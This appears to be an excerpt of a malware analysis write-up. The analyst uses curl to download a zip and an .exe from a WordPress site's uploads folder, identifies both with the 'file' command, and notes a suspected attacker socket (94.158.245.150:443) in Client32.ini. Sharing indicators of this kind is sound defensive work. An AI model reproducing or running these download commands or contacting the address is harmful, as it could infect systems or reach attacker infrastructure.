λ curl https://moodi-wood.com/wp-content/uploads/astra/DancingParty.zip -o DancingParty.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 2618k  100 2618k    0     0  1824k      0  0:00:01  0:00:01 --:--:-- 1827k

C:\Users\root\Desktop
λ curl https://moodi-wood.com/wp-content/uploads/astra/CareAbout.exe -o CareAbout.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  103k  100  103k    0     0   105k      0 --:--:-- --:--:-- --:--:--  105k

C:\Users\root\Desktop
λ file DancingParty.zip
DancingParty.zip: Zip archive data, at least v2.0 to extract

C:\Users\root\Desktop
λ file CareAbout.exe
CareAbout.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Unzipping DancingParty.zip and analyzing the folder’s contents. The file Client32.ini contained the socket 94.158.245.150:443, which I assume points to a malicious attacker.

client32ini

@loland